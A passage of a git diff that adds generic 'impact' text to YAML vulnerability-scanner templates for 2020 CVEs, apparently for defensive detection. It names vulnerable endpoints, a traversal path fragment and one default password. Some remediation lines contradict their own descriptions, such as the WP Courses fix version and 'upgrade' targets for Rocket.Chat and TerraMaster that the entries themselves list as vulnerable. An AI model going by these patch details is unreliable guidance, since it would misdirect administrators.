b/http/cves/2020/CVE-2020-26214.yaml index 305ccadb0c..2d280b0640 100644 --- a/http/cves/2020/CVE-2020-26214.yaml +++ b/http/cves/2020/CVE-2020-26214.yaml @@ -5,6 +5,8 @@ info: author: CasperGN,daffainfo severity: critical description: Alerta prior to version 8.1.0 is prone to authentication bypass when using LDAP as an authorization provider and the LDAP server accepts Unauthenticated Bind requests. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to Alerta. remediation: | Upgrade Alerta to version 8.1.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-26217.yaml b/http/cves/2020/CVE-2020-26217.yaml index 671cbbad19..cae2bf3bd0 100644 --- a/http/cves/2020/CVE-2020-26217.yaml +++ b/http/cves/2020/CVE-2020-26217.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XStream before 1.4.14 is susceptible to remote code execution. An attacker can run arbitrary shell commands by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Users who rely on blocklists are affected. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Fixed in 1.4.14. reference: - https://x-stream.github.io/CVE-2020-26217.html diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml index 13d1f4a1dc..4af7c1aeaa 100644 --- a/http/cves/2020/CVE-2020-26248.yaml +++ b/http/cves/2020/CVE-2020-26248.yaml @@ -6,6 +6,8 @@ info: severity: high description: | PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in 4.2.1. reference: - https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html diff --git a/http/cves/2020/CVE-2020-26258.yaml b/http/cves/2020/CVE-2020-26258.yaml index 5766b58c63..65c047e982 100644 --- a/http/cves/2020/CVE-2020-26258.yaml +++ b/http/cves/2020/CVE-2020-26258.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XStream before 1.4.15 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to data leakage or further attacks. remediation: Install at least 1.4.15 if you rely on XStream's default blacklist of the Security Framework, and at least Java 15 or higher. reference: - https://x-stream.github.io/CVE-2020-26258.html diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index 5534237a40..702ec84c0e 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -5,6 +5,8 @@ info: author: _0xf4n9x_,pikpikcu severity: medium description: GitLab CE and EE 13.4 through 13.6.2 is susceptible to Information disclosure via GraphQL. User email is visible. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can gain unauthorized access to sensitive information. remediation: | Upgrade Gitlab CE/EE to version 13.6.3 or later. reference: diff --git a/http/cves/2020/CVE-2020-26876.yaml b/http/cves/2020/CVE-2020-26876.yaml index 4218a0950b..d865cd6679 100644 --- a/http/cves/2020/CVE-2020-26876.yaml +++ b/http/cves/2020/CVE-2020-26876.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: WordPress WP Courses Plugin < 2.0.29 contains a critical information disclosure which exposes private course videos and materials. + impact: | + An attacker can exploit this vulnerability to gain sensitive information about the WordPress WP Courses Plugin. remediation: | Update to the latest version of the WordPress WP Courses Plugin (1.0.9) to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-26919.yaml b/http/cves/2020/CVE-2020-26919.yaml index 4f3b5dedfe..b906b3a779 100644 --- a/http/cves/2020/CVE-2020-26919.yaml +++ b/http/cves/2020/CVE-2020-26919.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: NETGEAR ProSAFE Plus before 2.6.0.43 is susceptible to unauthenticated remote code execution. Any HTML page is allowed as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. remediation: | Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml index 3e578ed1f5..35a19e7d6c 100644 --- a/http/cves/2020/CVE-2020-26948.yaml +++ b/http/cves/2020/CVE-2020-26948.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter. + impact: | + An attacker can exploit this vulnerability to access internal resources, perform port scanning, and potentially pivot to other systems. remediation: | Apply the latest security patches or upgrade to a patched version of Emby Server. reference: diff --git a/http/cves/2020/CVE-2020-27191.yaml b/http/cves/2020/CVE-2020-27191.yaml index dbd1cbd74d..58bb2850b8 100644 --- a/http/cves/2020/CVE-2020-27191.yaml +++ b/http/cves/2020/CVE-2020-27191.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data. remediation: | Upgrade LionWiki to version 3.2.12 or later to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index f618a76212..3f8e4c1926 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | JD Edwards EnterpriseOne Tools 9.2 is susceptible to information disclosure via the Monitoring and Diagnostics component. An attacker with network access via HTTP can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-27361.yaml b/http/cves/2020/CVE-2020-27361.yaml index f430029a07..159732b9a4 100644 --- a/http/cves/2020/CVE-2020-27361.yaml +++ b/http/cves/2020/CVE-2020-27361.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Akkadian Provisioning Manager 4.50.02 could allow viewing of sensitive information within the /pme subdirectories. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks. remediation: | Apply the latest patch or upgrade to a newer version of Akkadian Provisioning Manager to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml index 8ba6a6a615..4a56960de0 100644 --- a/http/cves/2020/CVE-2020-27467.yaml +++ b/http/cves/2020/CVE-2020-27467.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or gain unauthorized access to the system. remediation: | Upgrade Processwire CMS to version 2.7.1 or later to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index f540af8a61..2935041113 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin <= 2.1.4 exists due to the usage of "wp_ajax_nopriv" call in WordPress, which allows any unauthenticated user to get access to the function "gdlr_lms_cancel_booking" where POST Parameter "id" was sent straight into SQL query without sanitization. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version of the Good Layers LMS Plugin (2.1.5 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-27735.yaml b/http/cves/2020/CVE-2020-27735.yaml index 1d2608f5e5..467b7a6c34 100644 --- a/http/cves/2020/CVE-2020-27735.yaml +++ b/http/cves/2020/CVE-2020-27735.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Wing FTP server or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-27866.yaml b/http/cves/2020/CVE-2020-27866.yaml index 19945a3ecb..08cfe95452 100644 --- a/http/cves/2020/CVE-2020-27866.yaml +++ b/http/cves/2020/CVE-2020-27866.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to the router's settings, allowing an attacker to modify network configurations, intercept traffic, or launch further attacks. remediation: | Apply the latest firmware update provided by NETGEAR to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index 2fad5d25bc..572bbc4b57 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of IceWarp WebMail. reference: diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml index 691ed5020c..f917259c4b 100644 --- a/http/cves/2020/CVE-2020-27986.yaml +++ b/http/cves/2020/CVE-2020-27986.yaml @@ -7,6 +7,8 @@ info: description: | SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to sensitive information. remediation: Reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." reference: - https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/ diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index ad4224d2a8..61114a378b 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php. + impact: | + An attacker can enumerate valid usernames, potentially aiding in further attacks. remediation: | Upgrade TerraMaster TOS to version 4.2.06 or later. reference: diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml index 951c27fab6..af736d5548 100644 --- a/http/cves/2020/CVE-2020-28188.yaml +++ b/http/cves/2020/CVE-2020-28188.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: TerraMaster TOS <= 4.2.06 is susceptible to a remote code execution vulnerability which could allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php via the Event parameter. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: | Apply the latest security patch or update provided by TerraMaster to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index 6ca985d591..78e0d0304f 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Rocket.Chat through 3.9.1 is susceptible to information disclosure. An attacker can enumerate email addresses via the password reset function and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + impact: | + The vulnerability can lead to the exposure of sensitive information, such as user credentials or private conversations, potentially compromising the confidentiality of the system. remediation: | Upgrade Rocket.Chat to version 3.9.1 or later to mitigate the information disclosure vulnerability (CVE-2020-28208). reference: diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml index abdd5d1088..720e7c53ce 100644 --- a/http/cves/2020/CVE-2020-28351.yaml +++ b/http/cves/2020/CVE-2020-28351.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Mitel ShoreTel 19.46.1802.0 devices and their conference component are vulnerable to an unauthenticated attacker conducting reflected cross-site scripting attacks via the PATH_INFO variable to index.php due to insufficient validation for the time_zone object in the HOME_MEETING& page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Mitel to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index 67d8e84484..b565cd098e 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected system. remediation: | Upgrade to a patched version of Monitorr or apply the necessary security patches. reference: diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index 266da7d2ec..298a70090a 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -5,6 +5,8 @@ info: author: LogicalHunter severity: medium description: WordPress Canto plugin 1.3.0 is susceptible to blind server-side request forgery. An attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources and potential data leakage. remediation: | Update WordPress Canto to the latest version (1.3.1) or apply the patch provided by the vendor. reference: diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index 532de6ce7c..b88fa68df5 100644 --- a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: PacsOne Server (PACS Server In One Box) below 7.1.1 is vulnerable to cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to PacsOne Server version 7.1.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml index 43a0012c99..09f2340bfb 100644 --- a/http/cves/2020/CVE-2020-29227.yaml +++ b/http/cves/2020/CVE-2020-29227.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, leading to code execution. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in the Car Rental Management System 1.0. reference: diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml index 5b0002d0a8..153b1b5891 100644 --- a/http/cves/2020/CVE-2020-29284.yaml +++ b/http/cves/2020/CVE-2020-29284.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Multi Restaurant Table Reservation System 1.0. reference: diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index 1ceb572bfa..9bce8e3754 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: | Update to the latest version of the Wordpress EventON Calendar plugin (3.0.6) to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-29453.yaml b/http/cves/2020/CVE-2020-29453.yaml index d1004e1132..58b79368a1 100644 --- a/http/cves/2020/CVE-2020-29453.yaml +++ b/http/cves/2020/CVE-2020-29453.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check. + impact: | + An attacker can retrieve sensitive files containing configuration information, potentially leading to further exploitation or unauthorized access. remediation: | Apply the necessary patches or updates provided by Atlassian to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml index 593ec5ec0a..2051651eb4 100644 --- a/http/cves/2020/CVE-2020-29583.yaml +++ b/http/cves/2020/CVE-2020-29583.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the affected device, potentially leading to further compromise of the network. remediation: | Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue. reference: diff --git a/http/cves/2020/CVE-2020-29597.yaml b/http/cves/2020/CVE-2020-29597.yaml index e5c059ff37..e24f77f4f1 100644 --- a/http/cves/2020/CVE-2020-29597.yaml +++ b/http/cves/2020/CVE-2020-29597.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access, data leakage, and potential remote code execution. remediation: | Apply the latest security patch or update to a version that addresses the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-3187.yaml b/http/cves/2020/CVE-2020-3187.yaml index a98064e04a..487dacee51 100644 --- a/http/cves/2020/CVE-2020-3187.yaml +++ b/http/cves/2020/CVE-2020-3187.yaml @@ -5,6 +5,8 @@ info: author: KareemSe1im severity: critical description: Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are susceptible to directory traversal vulnerabilities that could allow an unauthenticated, remote attacker to obtain read and delete access to sensitive files on a targeted system. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the affected system, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Apply the necessary security patches or updates provided by Cisco to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml index d4ee715e7e..b4d0decb77 100644 --- a/http/cves/2020/CVE-2020-3452.yaml +++ b/http/cves/2020/CVE-2020-3452.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software is vulnerable to local file inclusion due to directory traversal attacks that can read sensitive files on a targeted system because of a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the affected system. remediation: | Apply the necessary security patches or updates provided by Cisco to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml index 5a9c40133f..a92aea8e4c 100644 --- a/http/cves/2020/CVE-2020-35234.yaml +++ b/http/cves/2020/CVE-2020-35234.yaml @@ -5,6 +5,8 @@ info: author: PR3R00T severity: high description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access. + impact: | + Low: Information disclosure remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-35234 diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml index 09b989aa2e..0786f6b27f 100644 --- a/http/cves/2020/CVE-2020-35338.yaml +++ b/http/cves/2020/CVE-2020-35338.yaml @@ -5,6 +5,8 @@ info: author: Jeya Seelan severity: critical description: Wireless Multiplex Terminal Playout Server <=20.2.8 has a default account with a password of pokon available via its web administrative interface. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the server. remediation: | Change the default credentials to strong and unique ones. reference: diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index 43f3323a34..ca274ef38a 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | OpenTSDB 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade OpenTSDB to a version higher than 2.4.0 to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35489.yaml b/http/cves/2020/CVE-2020-35489.yaml index 74c48913ac..6edf3960cb 100644 --- a/http/cves/2020/CVE-2020-35489.yaml +++ b/http/cves/2020/CVE-2020-35489.yaml @@ -5,6 +5,8 @@ info: author: soyelmago severity: critical description: WordPress Contact Form 7 before 5.3.2 allows unrestricted file upload and remote code execution because a filename may contain special characters. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to the target system and potential remote code execution. remediation: | Update to the latest version of the Contact Form 7 plugin to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml index d675bb2392..902654cbe5 100644 --- a/http/cves/2020/CVE-2020-35580.yaml +++ b/http/cves/2020/CVE-2020-35580.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in FileServlet that allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Upgrade to SearchBlox version 9.2.2 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index 6148104d45..8ff0f74592 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Advanced Comment System 1.0. reference: diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml index 281c0ede28..dff3f2f0f9 100644 --- a/http/cves/2020/CVE-2020-35713.yaml +++ b/http/cves/2020/CVE-2020-35713.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device. remediation: | Update the Belkin Linksys RE6500 firmware to version 1.0.012.001 or later. reference: diff --git a/http/cves/2020/CVE-2020-35729.yaml b/http/cves/2020/CVE-2020-35729.yaml index 4c7692fa84..3675200023 100644 --- a/http/cves/2020/CVE-2020-35729.yaml +++ b/http/cves/2020/CVE-2020-35729.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7. + impact: | + An attacker can execute arbitrary commands on the server, leading to remote code execution and potential compromise of the system. remediation: | Upgrade to a patched version of Klog Server (>=2.42) or apply the vendor-supplied patch. reference: diff --git a/http/cves/2020/CVE-2020-35736.yaml b/http/cves/2020/CVE-2020-35736.yaml index 6135c7e3d6..5ef50b6386 100644 --- a/http/cves/2020/CVE-2020-35736.yaml +++ b/http/cves/2020/CVE-2020-35736.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. local file inclusion because os.path.join is incorrectly used. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate the LFI vulnerability in GateOne 1.1. reference: diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml index f16b69a0b8..51782baa96 100644 --- a/http/cves/2020/CVE-2020-35749.yaml +++ b/http/cves/2020/CVE-2020-35749.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: high description: WordPress Simple Job Board prior to version 2.9.4 is vulnerable to arbitrary file retrieval vulnerabilities because it does not validate the sjb_file parameter when viewing a resume, allowing an authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via local file inclusion. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise. remediation: | Update to WordPress Simple Job Board version 2.9.4 or later to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35774.yaml b/http/cves/2020/CVE-2020-35774.yaml index 77e7cc94f6..5cf5d6a821 100644 --- a/http/cves/2020/CVE-2020-35774.yaml +++ b/http/cves/2020/CVE-2020-35774.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | twitter-server before 20.12.0 is vulnerable to cross-site scripting in some configurations. The vulnerability exists in the administration panel of twitter-server in the histograms component via server/handler/HistogramQueryHandler.scala. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, data theft, or defacement. remediation: | Apply the latest security patches or updates provided by Twitter to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml index 682ebe4c57..09f1b1160a 100644 --- a/http/cves/2020/CVE-2020-3580.yaml +++ b/http/cves/2020/CVE-2020-3580.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are vulnerable to cross-site scripting and could allow an unauthenticated, remote attacker to conduct attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the reference links. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Cisco to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index c3c86b412b..0f1d5ff738 100644 --- a/http/cves/2020/CVE-2020-35846.yaml +++ 